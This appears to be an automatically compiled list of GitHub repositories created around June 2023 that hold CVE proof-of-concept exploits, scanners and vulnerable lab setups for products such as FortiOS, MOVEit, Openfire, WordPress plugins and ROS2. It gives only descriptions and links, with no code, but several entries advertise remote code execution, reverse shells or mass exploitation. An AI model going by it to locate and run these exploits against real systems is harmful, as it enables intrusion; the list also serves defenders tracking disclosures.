**This repository contains a Python script to automate the process of testing for a vulnerability known as Text4Shell, referenced under the CVE id: CVE-2022-42889.** : [gustanini/CVE-2022-42889-Text4Shell-POC](https://github.com/gustanini/CVE-2022-42889-Text4Shell-POC) create time: 2023-06-27T08:29:24Z

**XSS in angular-ui-notification** : [Xh4H/CVE-2023-34840](https://github.com/Xh4H/CVE-2023-34840) create time: 2023-06-27T08:20:20Z

**A Python script for generating exploits targeting CVE-2022-4510 RCE Binwalk. It supports SSH, command execution, and reverse shell options. Exploits are saved in PNG format. Ideal for testing and demonstrations.** : [adhikara13/CVE-2022-4510-WalkingPath](https://github.com/adhikara13/CVE-2022-4510-WalkingPath) create time: 2023-06-27T02:20:13Z

**An exploit for the Nibbles manager version 4.0.3. This exploit allows RCE to be performed.** : [FredBrave/CVE-2015-6967](https://github.com/FredBrave/CVE-2015-6967) create time: 2023-06-26T19:15:37Z

**Gibbon本地文件包含漏洞(CVE-2023-34598)** : [Szlein/CVE-2023-34598](https://github.com/Szlein/CVE-2023-34598) create time: 2023-06-26T15:14:47Z

**Lightdash文件读取漏洞(CVE-2023-35844)** : [Szlein/CVE-2023-35844](https://github.com/Szlein/CVE-2023-35844) create time: 2023-06-26T10:14:29Z

**no description** : [manavvedawala/CVE-2023-32243-proof-of-concept](https://github.com/manavvedawala/CVE-2023-32243-proof-of-concept) create time: 2023-06-26T08:17:47Z

**ApacheOfBiz 17.12.01 Remote Code Execution** : [birdlinux/CVE-2020-9496](https://github.com/birdlinux/CVE-2020-9496) create time: 2023-06-26T06:56:38Z

**Apache 2.4.50 Automated Remote Code Execution and Path traversal** : [birdlinux/CVE-2021-42013](https://github.com/birdlinux/CVE-2021-42013) create time: 2023-06-26T06:39:57Z

**Tools for working with ImageMagick to handle arbitrary file read vulnerabilities. Generate, read, and apply profile information to PNG files using a command-line interface.** : [adhikara13/CVE-2022-44268-MagiLeak](https://github.com/adhikara13/CVE-2022-44268-MagiLeak) create time: 2023-06-25T20:52:57Z

**SPIP Vulnerability Scanner - CVE-2023-27372 Detector** : [Chocapikk/CVE-2023-27372](https://github.com/Chocapikk/CVE-2023-27372) create time: 2023-06-25T19:30:08Z

**Shellshock is a vulnerability that allows systems containing a vulnerable version of Bash to be exploited to execute commands with higher privileges. This allows attackers to potentially take over that system. In the demo, we will learn how to detect and exploit such vulnerabilities in a given target.** : [hheeyywweellccoommee/CVE-2014-6271-Shellshock-Vulnerability-vazft](https://github.com/hheeyywweellccoommee/CVE-2014-6271-Shellshock-Vulnerability-vazft) create time: 2023-06-21T09:00:23Z

**no description** : [pashayogi/CVE-2023-22809](https://github.com/pashayogi/CVE-2023-22809) create time: 2023-06-25T15:11:01Z

**command injection vulnerability in SolarView Compact poc version 6.0** : [WhiteOwl-Pub/PoC-SolarView-Compact-CVE-2023-23333](https://github.com/WhiteOwl-Pub/PoC-SolarView-Compact-CVE-2023-23333) create time: 2023-06-25T09:16:16Z

**2022 Spring Prof. 謝續平** : [cassie0206/CVE-2022-21907](https://github.com/cassie0206/CVE-2022-21907) create time: 2023-04-25T01:13:51Z

**PoC for Responsive Filemanager < 9.12.0 bypass upload restrictions lead to RCE** : [HerrLeStrate/CVE-2022-44276-PoC](https://github.com/HerrLeStrate/CVE-2022-44276-PoC) create time: 2023-06-24T19:28:44Z

**CVE-2021-46704 GenieACS Command Injection POC** : [hheeyywweellccoommee/CVE-2021-46704-POC-bsnln](https://github.com/hheeyywweellccoommee/CVE-2021-46704-POC-bsnln) create time: 2023-06-21T13:00:53Z

**no description** : [sahiloj/CVE-2023-34839](https://github.com/sahiloj/CVE-2023-34839) create time: 2023-06-23T11:51:46Z

**no description** : [sahiloj/CVE-2023-34838](https://github.com/sahiloj/CVE-2023-34838) create time: 2023-06-23T11:51:21Z

**no description** : [sahiloj/CVE-2023-34837](https://github.com/sahiloj/CVE-2023-34837) create time: 2023-06-23T11:50:45Z

**no description** : [sahiloj/CVE-2023-34836](https://github.com/sahiloj/CVE-2023-34836) create time: 2023-06-23T11:50:12Z

**no description** : [sahiloj/CVE-2023-34835](https://github.com/sahiloj/CVE-2023-34835) create time: 2023-06-23T11:49:37Z

**An exploit for CVE-2018-5955 GitStack 2.3.10 Unauthenticated RCE** : [MikeTheHash/CVE-2018-5955](https://github.com/MikeTheHash/CVE-2018-5955) create time: 2023-06-23T20:25:47Z

**Multiple Cross-Site Scripting (XSS) vulnerabilities have been identified in Gibbon v25.0.0, which enable attackers to execute arbitrary Javascript code.** : [maddsec/CVE-2023-34599](https://github.com/maddsec/CVE-2023-34599) create time: 2023-06-23T20:10:33Z

**Gibbon v25.0.0 is vulnerable to a Local File Inclusion (LFI) vulnerability where it's possible to include the content of several files present in the installation folder in the server's response.** : [maddsec/CVE-2023-34598](https://github.com/maddsec/CVE-2023-34598) create time: 2023-06-23T19:49:38Z

**DoS against Belkin smart plugs via crafted firmware injection** : [purseclab/CVE-2023-33768](https://github.com/purseclab/CVE-2023-33768) create time: 2023-06-23T18:28:18Z

**Windows Network File System Remote exploit (DoS) PoC** : [VEEXH/CVE-2022-30136](https://github.com/VEEXH/CVE-2022-30136) create time: 2023-06-23T17:13:22Z

**no description** : [puckiestyle/cve-2023-27997](https://github.com/puckiestyle/cve-2023-27997) create time: 2023-06-23T15:15:54Z

**PoC for CVE-2023-2579** : [daniloalbuqrque/poc-cve-xss-inventory-press-plugin](https://github.com/daniloalbuqrque/poc-cve-xss-inventory-press-plugin) create time: 2023-04-21T16:22:10Z

**Reproduction files for CVE-2022-44312 through CVE-2022-44321** : [Halcy0nic/CVEs-for-picoc-3.2.2](https://github.com/Halcy0nic/CVEs-for-picoc-3.2.2) create time: 2023-06-23T00:16:52Z

**no description** : [leonardobg/CVE-2023-36146](https://github.com/leonardobg/CVE-2023-36146) create time: 2023-06-22T22:06:21Z

**no description** : [leonardobg/CVE-2023-36144](https://github.com/leonardobg/CVE-2023-36144) create time: 2023-06-22T22:00:30Z

**no description** : [leonardobg/CVE-2023-36143](https://github.com/leonardobg/CVE-2023-36143) create time: 2023-06-22T21:56:16Z

**no description** : [cyberqueenmeg/cve-2022-33082-exploit](https://github.com/cyberqueenmeg/cve-2022-33082-exploit) create time: 2023-06-22T17:50:18Z

**no description** : [hheeyywweellccoommee/vnc-lab-cve-2019-17662-vqdwt](https://github.com/hheeyywweellccoommee/vnc-lab-cve-2019-17662-vqdwt) create time: 2023-06-22T12:00:49Z

**Unauthorized Access Vulnerability in ROS2 Foxy Fitzroy** : [16yashpatel/CVE-2023-33567](https://github.com/16yashpatel/CVE-2023-33567) create time: 2023-06-22T16:39:52Z

**Unauthorized Node Injection Vulnerability in ROS2 Foxy Fitzroy** : [16yashpatel/CVE-2023-33566](https://github.com/16yashpatel/CVE-2023-33566) create time: 2023-06-22T16:36:33Z

**Denial-of-Service (DoS) Vulnerability in ROS2 Foxy Fitzroy** : [16yashpatel/CVE-2023-33565](https://github.com/16yashpatel/CVE-2023-33565) create time: 2023-06-22T16:26:55Z

**no description** : [imbas007/CVE-2023-27997-Check](https://github.com/imbas007/CVE-2023-27997-Check) create time: 2023-06-22T14:16:44Z

**no description** : [medarov411/vnc-lab-cve-2019-17662](https://github.com/medarov411/vnc-lab-cve-2019-17662) create time: 2023-06-22T11:19:27Z

**elFinder < 2.1.62 - Path Traversal vulnerability in PHP LocalVolumeDriver connector** : [afine-com/CVE-2023-35840](https://github.com/afine-com/CVE-2023-35840) create time: 2023-06-22T09:34:49Z

**CVE-2021-46704 Nuclei template** : [Erenlancaster/CVE-2021-46704](https://github.com/Erenlancaster/CVE-2021-46704) create time: 2023-06-22T05:03:15Z

**An exploit for CVE-2022-42475, a pre-authentication heap overflow in Fortinet networking products** : [0xhaggis/CVE-2022-42475](https://github.com/0xhaggis/CVE-2022-42475) create time: 2023-06-21T21:22:35Z

**A download of code without integrity check vulnerability in the "execute restore src-vis" command of FortiOS before 7.0.3.** : [0xhaggis/CVE-2021-44186](https://github.com/0xhaggis/CVE-2021-44186) create time: 2023-02-08T07:30:52Z

**Exploit for CVE-2021-3036, HTTP Smuggling + buffer overflow in PanOS 8.x** : [0xhaggis/CVE-2021-3064](https://github.com/0xhaggis/CVE-2021-3064) create time: 2022-04-26T08:41:14Z

**no description** : [tsong0ku/CVE-2018-11776-FIS](https://github.com/tsong0ku/CVE-2018-11776-FIS) create time: 2023-06-21T15:08:39Z

**CVE-2021-46704 GenieACS Command Injection POC** : [MithatGuner/CVE-2021-46704-POC](https://github.com/MithatGuner/CVE-2021-46704-POC) create time: 2023-06-21T12:29:43Z

**Shellshock is a vulnerability that allows systems containing a vulnerable version of Bash to be exploited to execute commands with higher privileges. This allows attackers to potentially take over that system. In the demo, we will learn how to detect and exploit such vulnerabilities in a given target.** : [Darkrai-404/CVE-2014-6271-Shellshock-Vulnerability](https://github.com/Darkrai-404/CVE-2014-6271-Shellshock-Vulnerability) create time: 2023-06-21T07:11:51Z

**Reflected Cross-Site-Scripting** : [huzefa2212/CVE-2023-30347](https://github.com/huzefa2212/CVE-2023-30347) create time: 2023-06-21T07:03:43Z

**Hyper-V 1-day Exploit: CVE-2020-0917** : [L0ch/CVE-2020-0917_Exploit](https://github.com/L0ch/CVE-2020-0917_Exploit) create time: 2023-06-21T02:35:14Z

**POC Exploit to add user to Sudo for CVE-2022-0847 Dirty Pipe Vulnerability** : [0xeremus/dirty-pipe-poc](https://github.com/0xeremus/dirty-pipe-poc) create time: 2023-06-20T23:48:24Z

**no description** : [fu2x2000/-CVE-2023-34584](https://github.com/fu2x2000/-CVE-2023-34584) create time: 2023-06-20T20:17:13Z

**no description** : [hacip/CVE-2023-33405](https://github.com/hacip/CVE-2023-33405) create time: 2023-06-20T18:37:44Z

**no description** : [hacip/CVE-2023-33404](https://github.com/hacip/CVE-2023-33404) create time: 2023-06-20T18:14:58Z

**Pilot program for CVE submission through GitHub. CVE Record Submission via Pilot PRs ending 6/30/2023** : [CVEProject/cvelist](https://github.com/CVEProject/cvelist) create time: 2020-11-02T19:30:55Z

**PoC and exploit for CVE-2022-22965 Spring4Shell** : [jakabakos/spring4shell](https://github.com/jakabakos/spring4shell) create time: 2023-06-20T11:45:29Z

**no description** : [JasaluRah/Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-](https://github.com/JasaluRah/Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-) create time: 2023-06-20T12:20:20Z

**no description** : [hheeyywweellccoommee/CVE-2023-30212-Vulnerable-Lab-xjghb](https://github.com/hheeyywweellccoommee/CVE-2023-30212-Vulnerable-Lab-xjghb) create time: 2023-06-17T12:01:21Z

**no description** : [AAsh035/CVE-2023-30212](https://github.com/AAsh035/CVE-2023-30212) create time: 2023-06-20T10:50:30Z

**This contains the necessary files and Docker to replicate A vulnerability in OURPHP that has a XSS Vulnerability (CVE-2023-30212)** : [VisDev23/Vulnerable-Docker--CVE-2023-30212-](https://github.com/VisDev23/Vulnerable-Docker--CVE-2023-30212-) create time: 2023-06-20T09:08:38Z

**no description** : [VisDev23/Vulnerable-Docker-CVE-2023-30212](https://github.com/VisDev23/Vulnerable-Docker-CVE-2023-30212) create time: 2023-06-20T08:18:43Z

**no description** : [Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln](https://github.com/Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln) create time: 2023-06-20T08:12:49Z

**no description** : [mellow-hype/cve-2023-33476](https://github.com/mellow-hype/cve-2023-33476) create time: 2023-06-20T01:13:17Z

**no description** : [overgrowncarrot1/CVE-2021-22911](https://github.com/overgrowncarrot1/CVE-2021-22911) create time: 2023-06-19T23:56:09Z

**Analysis & Exploit** : [Chan9Yan9/CVE-2023-22809](https://github.com/Chan9Yan9/CVE-2023-22809) create time: 2023-06-20T00:38:08Z

**Mass Exploit Privileges Authentication (Subscriber to Administrator) - Wordpress Plugin ReviewX** : [Alucard0x1/CVE-2023-2833](https://github.com/Alucard0x1/CVE-2023-2833) create time: 2023-06-19T22:10:09Z

**Safely detect whether a FortiGate SSL VPN instance is vulnerable to CVE-2023-27997 based on response timing** : [BishopFox/CVE-2023-27997-check](https://github.com/BishopFox/CVE-2023-27997-check) create time: 2023-06-16T20:15:36Z

**no description** : [arunsnap/CVE-2023-30212-POC](https://github.com/arunsnap/CVE-2023-30212-POC) create time: 2023-06-19T16:30:05Z

**SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.** : [nuts7/CVE-2023-27372](https://github.com/nuts7/CVE-2023-27372) create time: 2023-06-19T14:36:47Z

**no description** : [a-bazi/test2-CVE-2023-29325](https://github.com/a-bazi/test2-CVE-2023-29325) create time: 2023-06-19T12:57:43Z

**Environment for CVE-2019-6340 (Drupal)** : [knqyf263/CVE-2019-6340](https://github.com/knqyf263/CVE-2019-6340) create time: 2019-02-23T13:28:58Z

**Proof-of-Concept for privileged file read through CheckPoint SNX VPN Linux Client** : [joaovarelas/CVE-2021-30357_CheckPoint_SNX_VPN_PoC](https://github.com/joaovarelas/CVE-2021-30357_CheckPoint_SNX_VPN_PoC) create time: 2023-06-18T21:52:28Z

**no description** : [MaThEw-ViNcEnT/CVE-2023-30212-OURPHP-Vulnerability](https://github.com/MaThEw-ViNcEnT/CVE-2023-30212-OURPHP-Vulnerability) create time: 2023-06-18T19:56:09Z

**Openfire Console Authentication Bypass Vulnerability** : [miko550/CVE-2023-32315](https://github.com/miko550/CVE-2023-32315) create time: 2023-06-18T15:42:00Z

**no description** : [Wh04m1001/CVE-2023-20178](https://github.com/Wh04m1001/CVE-2023-20178) create time: 2023-06-18T12:22:57Z

**no description** : [Wh04m1001/CVE-2023-29343](https://github.com/Wh04m1001/CVE-2023-29343) create time: 2023-06-18T11:14:08Z

**Proof of Concept (PoC) URL generator for a reflected XSS vulnerability in the Advanced Custom Fields WordPress plugin.** : [Alucard0x1/CVE-2023-30777](https://github.com/Alucard0x1/CVE-2023-30777) create time: 2023-06-17T12:43:51Z

**no description** : [AAsh035/CVE2023-](https://github.com/AAsh035/CVE2023-) create time: 2023-06-17T11:35:31Z

**no description** : [AAsh035/CVE-2023-30212-Vulnerable-Lab](https://github.com/AAsh035/CVE-2023-30212-Vulnerable-Lab) create time: 2023-06-17T11:21:09Z

**no description** : [hheeyywweellccoommee/CVE-2018-1160-kxdmt](https://github.com/hheeyywweellccoommee/CVE-2018-1160-kxdmt) create time: 2023-05-10T01:00:35Z

**CVE-2023-24078 for FuguHub / BarracudaDrive** : [rio128128/CVE-2023-24078](https://github.com/rio128128/CVE-2023-24078) create time: 2023-06-17T10:11:24Z

**FortiOS 管理界面中的堆内存下溢导致远程代码执行** : [qi4L/CVE-2023-25610](https://github.com/qi4L/CVE-2023-25610) create time: 2023-06-17T06:57:28Z

**CVE-2023-24078 for FuguHub / BarracudaDrive** : [overgrowncarrot1/CVE-2023-24078](https://github.com/overgrowncarrot1/CVE-2023-24078) create time: 2023-06-17T03:39:35Z

**no description** : [hheeyywweellccoommee/CVE-2023-34362-zcial](https://github.com/hheeyywweellccoommee/CVE-2023-34362-zcial) create time: 2023-06-15T23:01:53Z

**SolarView Compact through 6.00 downloader.php commands injection (RCE) nuclei-templates** : [Mr-xn/CVE-2023-23333](https://github.com/Mr-xn/CVE-2023-23333) create time: 2023-06-16T14:33:31Z

**no description** : [leekenghwa/CVE-2023-34830---Reflected-XSS-found-in-I-doit-Open-v24-and-below](https://github.com/leekenghwa/CVE-2023-34830---Reflected-XSS-found-in-I-doit-Open-v24-and-below) create time: 2023-06-16T08:43:35Z

**CVE-2023-34600** : [costacoco/Adiscon](https://github.com/costacoco/Adiscon) create time: 2023-06-16T08:30:10Z

**no description** : [leekenghwa/CVE-2023-34830---XSS-Reflected-found-in-I-doit-open-v24-and-Bekiw](https://github.com/leekenghwa/CVE-2023-34830---XSS-Reflected-found-in-I-doit-open-v24-and-Bekiw) create time: 2023-06-16T08:18:29Z

**Joomla未授权访问漏洞** : [Sweelg/CVE-2023-23752](https://github.com/Sweelg/CVE-2023-23752) create time: 2023-06-16T07:53:22Z

**这个漏洞感觉只能信息泄露?** : [xkaneiki/CVE-2022-1011](https://github.com/xkaneiki/CVE-2022-1011) create time: 2023-06-16T03:02:38Z

**POC FortiOS SSL-VPN buffer overflow vulnerability** : [rio128128/CVE-2023-27997-POC](https://github.com/rio128128/CVE-2023-27997-POC) create time: 2023-06-16T03:25:19Z

**Repository with everything I have tracking the impact of MOVEit CVE-2023-34362** : [kenbuckler/MOVEit-CVE-2023-34362](https://github.com/kenbuckler/MOVEit-CVE-2023-34362) create time: 2023-06-16T00:39:37Z

**no description** : [sickthecat/CVE-2023-34362](https://github.com/sickthecat/CVE-2023-34362) create time: 2023-06-15T22:24:37Z

**Samba 3.0.20** : [MikeRega7/CVE-2007-2447-RCE](https://github.com/MikeRega7/CVE-2007-2447-RCE) create time: 2023-06-15T20:13:17Z

**no description** : [overgrowncarrot1/CVE-2023-0297](https://github.com/overgrowncarrot1/CVE-2023-0297) create time: 2023-06-15T14:28:05Z

**CVE-2021-24647 Pie Register < 3.7.1.6 - Unauthenticated Arbitrary Login** : [RandomRobbieBF/CVE-2021-24647](https://github.com/RandomRobbieBF/CVE-2021-24647) create time: 2023-06-15T09:51:36Z

**no description** : [lanleft/CVE2022-2586](https://github.com/lanleft/CVE2022-2586) create time: 2023-06-15T07:04:05Z

**no description** : [lanleft/CVE2023-1829](https://github.com/lanleft/CVE2023-1829) create time: 2023-06-15T03:27:03Z

**cve-2023-27997** : [Pik-sec/cve-2023-27997](https://github.com/Pik-sec/cve-2023-27997) create time: 2023-06-15T05:37:16Z

**no description** : [ChrisL0tus/CVE-2023-34924](https://github.com/ChrisL0tus/CVE-2023-34924) create time: 2023-06-15T03:12:35Z

**no description** : [TheSermux/CVE-2021-4034](https://github.com/TheSermux/CVE-2021-4034) create time: 2023-06-14T23:21:50Z

**Exploit for CVE-2022-44136 for chcking security of your site** : [IgorDuino/CVE-2022-44136-exploit](https://github.com/IgorDuino/CVE-2022-44136-exploit) create time: 2023-06-15T00:52:11Z

**no description** : [funny-kill/CVE-2023-34852](https://github.com/funny-kill/CVE-2023-34852) create time: 2023-06-15T01:23:08Z

**no description** : [5rGJ5aCh5oCq5YW9/CVE-2023-32315exp](https://github.com/5rGJ5aCh5oCq5YW9/CVE-2023-32315exp) create time: 2023-06-15T01:11:56Z

**no description** : [reinguyen/cve2018-15982](https://github.com/reinguyen/cve2018-15982) create time: 2023-06-14T16:27:42Z

**Exploit for CVE-2023-2249 in wpForo Forum plugin for WordPress** : [ixiacom/CVE-2023-2249](https://github.com/ixiacom/CVE-2023-2249) create time: 2023-06-13T18:13:27Z

**rce** : [tangxiaofeng7/CVE-2023-32315-Openfire-Bypass](https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass) create time: 2023-06-14T09:43:31Z

**no description** : [wh-gov/cve-2023-28310](https://github.com/wh-gov/cve-2023-28310) create time: 2023-06-14T09:23:34Z

**no description** : [ohnonoyesyes/CVE-2023-32315](https://github.com/ohnonoyesyes/CVE-2023-32315) create time: 2023-06-14T09:17:25Z

**VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)** : [miko550/CVE-2023-20887](https://github.com/miko550/CVE-2023-20887) create time: 2023-06-14T06:50:00Z

**no description** : [y0d3n/CVE-2014-0094](https://github.com/y0d3n/CVE-2014-0094) create time: 2023-06-14T02:06:58Z

**no description** : [tucommenceapousser/CVE-2021-46422](https://github.com/tucommenceapousser/CVE-2021-46422) create time: 2023-06-14T01:35:08Z

**福昕Foxit PDF远程代码执行漏洞CVE-2023-27363分析与复现** : [webraybtl/CVE-2023-27363](https://github.com/webraybtl/CVE-2023-27363) create time: 2023-06-14T01:18:09Z

**no description** : [KOwloid/cve-2023-36544](https://github.com/KOwloid/cve-2023-36544) create time: 2023-06-14T01:00:07Z

**Python 2.7** : [Jenderal92/CVE-2023-27350](https://github.com/Jenderal92/CVE-2023-27350) create time: 2023-06-13T22:13:24Z

**Proof of Concept for vulnerability CVE-2023-2986 in 'Abandoned Cart Lite for WooCommerce' Plugin in WordPress in Python Version** : [Alucard0x1/CVE-2023-2986](https://github.com/Alucard0x1/CVE-2023-2986) create time: 2023-06-13T20:35:03Z

**python program to exploit CVE-2023-21716** : [Lord-of-the-IoT/CVE-2023-21716](https://github.com/Lord-of-the-IoT/CVE-2023-21716) create time: 2023-06-13T19:04:45Z

**远程脚本** : [Idoies/cve-2023-66975](https://github.com/Idoies/cve-2023-66975) create time: 2023-06-13T13:28:02Z

**VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)** : [sinsinology/CVE-2023-20887](https://github.com/sinsinology/CVE-2023-20887) create time: 2023-06-13T13:17:23Z

**Sonatype Nexus 3.21.01 - Remote Code Execution (Authenticated - Updated)** : [hugosg97/CVE-2020-10199-Nexus-3.21.1](https://github.com/hugosg97/CVE-2020-10199-Nexus-3.21.1) create time: 2023-06-13T13:10:31Z

**POC FortiOS SSL-VPN buffer overflow vulnerability** : [hheeyywweellccoommee/CVE-2023-27997-POC-FortiOS-SSL-VPN-buffer-overflow-vulnerability-ssijz](https://github.com/hheeyywweellccoommee/CVE-2023-27997-POC-FortiOS-SSL-VPN-buffer-overflow-vulnerability-ssijz) create time: 2023-06-13T11:00:54Z

**POC FortiOS SSL-VPN buffer overflow vulnerability** : [Socra69/CVE-2023-27997-POC-FortiOS-SSL-VPN-buffer-overflow-vulnerability](https://github.com/Socra69/CVE-2023-27997-POC-FortiOS-SSL-VPN-buffer-overflow-vulnerability) create time: 2023-06-13T10:21:15Z

**no description** : [leekenghwa/CVE-2023-34537---XSS-reflected--found-in-HotelDruid-3.0.5](https://github.com/leekenghwa/CVE-2023-34537---XSS-reflected--found-in-HotelDruid-3.0.5) create time: 2023-06-13T09:10:35Z

**no description** : [leekenghwa/CVE-2023-33817---SQL-Injection-found-in-HotelDruid-3.0.5](https://github.com/leekenghwa/CVE-2023-33817---SQL-Injection-found-in-HotelDruid-3.0.5) create time: 2023-06-13T08:07:00Z

**CVE-2023-33246** : [hheeyywweellccoommee/CVE-2023-33246-dgjfd](https://github.com/hheeyywweellccoommee/CVE-2023-33246-dgjfd) create time: 2023-06-13T04:01:11Z

**Proof of concept code for CVE-2023-2008** : [bluefrostsecurity/CVE-2023-2008](https://github.com/bluefrostsecurity/CVE-2023-2008) create time: 2023-06-12T14:41:53Z

**A script, written in golang. POC for CVE-2023-25157** : [7imbitz/CVE-2023-25157-checker](https://github.com/7imbitz/CVE-2023-25157-checker) create time: 2023-06-12T14:34:14Z

**no description** : [omoknooni/CVE-2021-21311](https://github.com/omoknooni/CVE-2021-21311) create time: 2023-06-12T13:32:52Z

**This repository contains a Python script that checks WordPress websites for the CVE-2022-3590 vulnerability, which exploits an unauthenticated blind Server-Side Request Forgery (SSRF) in the WordPress pingback feature.** : [hxlxmjxbbxs/CVE-2022-3590-WordPress-Vulnerability-Scanner](https://github.com/hxlxmjxbbxs/CVE-2022-3590-WordPress-Vulnerability-Scanner) create time: 2023-06-12T13:06:54Z

**CVE-2023-34362: MOVEit Transfer Unauthenticated RCE** : [sfewer-r7/CVE-2023-34362](https://github.com/sfewer-r7/CVE-2023-34362) create time: 2023-06-12T12:56:12Z

**SSPanel UIM is a multi-purpose agency service sales management system specially designed for Shadowsocks / V2Ray / Trojan protocols. SSPanel-Uim version before 2023.3 does not restrict access to the /link/ interface,which can lead to a leak of user subscription information.** : [AgentY0/CVE-2023-34965](https://github.com/AgentY0/CVE-2023-34965) create time: 2023-06-12T12:42:48Z

**The php built-in function system used in the SSPanel-Uim code /src/Command/ClientDownload.php getSourceFile function does not limit the parameters passed in, which can lead to command execution vulnerabilities** : [happy0717/CVE-2023-34965](https://github.com/happy0717/CVE-2023-34965) create time: 2023-06-12T12:32:45Z

**MOVEit CVE-2023-34362** : [horizon3ai/CVE-2023-34362](https://github.com/horizon3ai/CVE-2023-34362) create time: 2023-06-09T19:07:32Z

**CVE-2023-20963 PoC (Android WorkSource parcel/unparcel logic mismatch)** : [Chal13W1zz/BadParcel](https://github.com/Chal13W1zz/BadParcel) create time: 2023-06-12T10:44:59Z

**Responsible disclosure of unpatched vulnerability in FluentCRM by WPManageNinja** : [karlemilnikka/CVE-2023-1430](https://github.com/karlemilnikka/CVE-2023-1430) create time: 2023-06-12T10:07:01Z

**CSV File Containing CVE-2023-34362 IOCs** : [lithuanian-g/cve-2023-34362-iocs](https://github.com/lithuanian-g/cve-2023-34362-iocs) create time: 2023-06-12T09:58:25Z

**Sinilink XY-WFTX Wifi Remote Thermostat Module Temperature Controller** : [9lyph/CVE-2022-43704](https://github.com/9lyph/CVE-2022-43704) create time: 2022-08-31T10:00:09Z

**GeoServer & GeoTools SQL Injection (CVE-2023-25157 & CVE-2023-25158)** : [murataydemir/CVE-2023-25157-and-CVE-2023-25158](https://github.com/murataydemir/CVE-2023-25157-and-CVE-2023-25158) create time: 2023-06-11T18:57:18Z

**no description** : [forthisvideo/CVE-2022-22274_poc](https://github.com/forthisvideo/CVE-2022-22274_poc) create time: 2023-06-11T16:56:53Z

**no description** : [andyhsu024/CVE-2022-45025](https://github.com/andyhsu024/CVE-2022-45025) create time: 2023-06-11T13:18:12Z

**no description** : [deathflash1411/cve-2021-41652](https://github.com/deathflash1411/cve-2021-41652) create time: 2023-06-11T06:33:01Z

**no description** : [deathflash1411/cve-2021-35448](https://github.com/deathflash1411/cve-2021-35448) create time: 2023-06-11T06:32:12Z

**no description** : [deathflash1411/cve-2022-25012](https://github.com/deathflash1411/cve-2022-25012) create time: 2023-06-11T06:33:25Z

**no description** : [tucommenceapousser/CVE-2023-29489.py](https://github.com/tucommenceapousser/CVE-2023-29489.py) create time: 2023-06-10T22:48:54Z

**no description** : [tucommenceapousser/CVE-2023-29489](https://github.com/tucommenceapousser/CVE-2023-29489) create time: 2023-06-10T22:34:59Z

**CVE-2023-25157 SQL injection vulnerability found in GeoServer** : [drfabiocastro/geoserver](https://github.com/drfabiocastro/geoserver) create time: 2023-06-10T00:47:32Z

**patch to compile jingpad source code (mainly use for CVE-2022-38694 now)** : [TomKing062/ud710_patch](https://github.com/TomKing062/ud710_patch) create time: 2023-06-10T11:47:31Z

**no description** : [DreamD2v/CVE-2023-31541](https://github.com/DreamD2v/CVE-2023-31541) create time: 2023-06-10T14:59:15Z

**no description** : [TomKing062/CVE-2022-38694_unlock_bootloader](https://github.com/TomKing062/CVE-2022-38694_unlock_bootloader) create time: 2023-06-10T08:31:26Z

**no description** : [0x2458bughunt/CVE-2023-25157](https://github.com/0x2458bughunt/CVE-2023-25157) create time: 2023-06-10T09:00:16Z

**A simple and quick way to check if your SQL Developer by Oracle is vulnerable to SQL Injection (CVE-2023-3163), most commonly occurs when SQL Developer version < 23.1.0.** : [George0Papasotiriou/CVE-2023-3163-SQL-Injection-Prevention](https://github.com/George0Papasotiriou/CVE-2023-3163-SQL-Injection-Prevention) create time: 2023-06-09T18:43:05Z

**Proof of Concept for vulnerability CVE-2023-2986 in 'Abandoned Cart Lite for WooCommerce' Plugin in WordPress** : [Ayantaker/CVE-2023-2986](https://github.com/Ayantaker/CVE-2023-2986) create time: 2023-06-09T17:44:09Z

**no description** : [m-cetin/CVE-2023-29336](https://github.com/m-cetin/CVE-2023-29336) create time: 2023-06-09T15:36:45Z

**no description** : [Zeeshan-1234/CVE-2018-6574](https://github.com/Zeeshan-1234/CVE-2018-6574) create time: 2023-06-09T14:08:23Z

**Barracuda Email Security Gateway Appliance (ESG) Vulnerability** : [hheeyywweellccoommee/CVE-2023-2868-lchvp](https://github.com/hheeyywweellccoommee/CVE-2023-2868-lchvp) create time: 2023-06-09T12:00:59Z

**no description** : [antisecc/CVE-2018-16763](https://github.com/antisecc/CVE-2018-16763) create time: 2023-06-09T13:01:48Z

**CVE-2023-0630 - Slimstat Analytics < 4.9.3.3 - Subscriber+ SQL Injection** : [RandomRobbieBF/CVE-2023-0630](https://github.com/RandomRobbieBF/CVE-2023-0630) create time: 2023-06-09T12:02:55Z

**Barracuda Email Security Gateway Appliance (ESG) Vulnerability** : [T13nn3s/CVE-2023-2868](https://github.com/T13nn3s/CVE-2023-2868) create time: 2023-06-09T11:22:55Z

**CVE-2023-34960 Chamilo PoC** : [Aituglo/CVE-2023-34960](https://github.com/Aituglo/CVE-2023-34960) create time: 2023-06-09T10:32:22Z

**no description** : [galoget/Thruk-CVE-2023-34096](https://github.com/galoget/Thruk-CVE-2023-34096) create time: 2023-06-09T02:17:25Z

**CVE-2022-0439 - Email Subscribers & Newsletters < 5.3.2 - Subscriber+ Blind SQL injection** : [RandomRobbieBF/CVE-2022-0439](https://github.com/RandomRobbieBF/CVE-2022-0439) create time: 2023-06-08T21:20:22Z

**Proof of Concept Code for CVE-2023-32353: Local privilege escalation via iTunes in Windows** : [86x/CVE-2023-32353-PoC](https://github.com/86x/CVE-2023-32353-PoC) create time: 2023-06-08T20:43:03Z

**no description** : [hello4r1end/patch_CVE-2023-22809](https://github.com/hello4r1end/patch_CVE-2023-22809) create time: 2023-06-08T18:39:44Z

**no description** : [Toxich4/CVE-2023-33253](https://github.com/Toxich4/CVE-2023-33253) create time: 2023-06-08T14:34:16Z

**cve-2023-2033 exploit** : [WalccDev/CVE-2023-2033](https://github.com/WalccDev/CVE-2023-2033) create time: 2023-06-08T12:29:08Z

**no description** : [Trinadh465/linux-4.19.72_CVE-2020-27786](https://github.com/Trinadh465/linux-4.19.72_CVE-2020-27786) create time: 2023-06-08T10:01:33Z

